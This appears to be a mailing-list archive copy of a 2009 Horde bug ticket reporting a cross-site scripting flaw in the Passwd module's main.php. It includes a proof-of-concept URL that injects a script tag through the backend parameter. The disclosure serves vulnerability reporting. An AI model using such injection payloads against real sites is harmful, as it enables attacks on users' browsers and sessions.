« Return to Thread: [Tickets #8398] Cross Site Scripting Vulnerability

[Tickets #8398] Cross Site Scripting Vulnerability

by bugs-14 :: Rate this Message:

Reply (Restricted by the Administrator) | Reply to Author | View in Thread

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/8398
------------------------------------------------------------------------------
Ticket | 8398
Created By | security@...
Summary | Cross Site Scripting Vulnerability
Queue | Passwd
Version | 3.1
Type | Bug
State | Unconfirmed
Priority | 2. Medium
Milestone |
Patch |
Owners |
------------------------------------------------------------------------------

security@... (2009-07-03 14:45) wrote:

A cross site scripting vulnerability exists. Proof of concept:

http://hordeserver.com/horde/passwd/main.php?backend="><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password

--
You are subscribed to this list as: lists@...
To unsubscribe, mail: bugs-unsubscribe@...

« Return to Thread: [Tickets #8398] Cross Site Scripting Vulnerability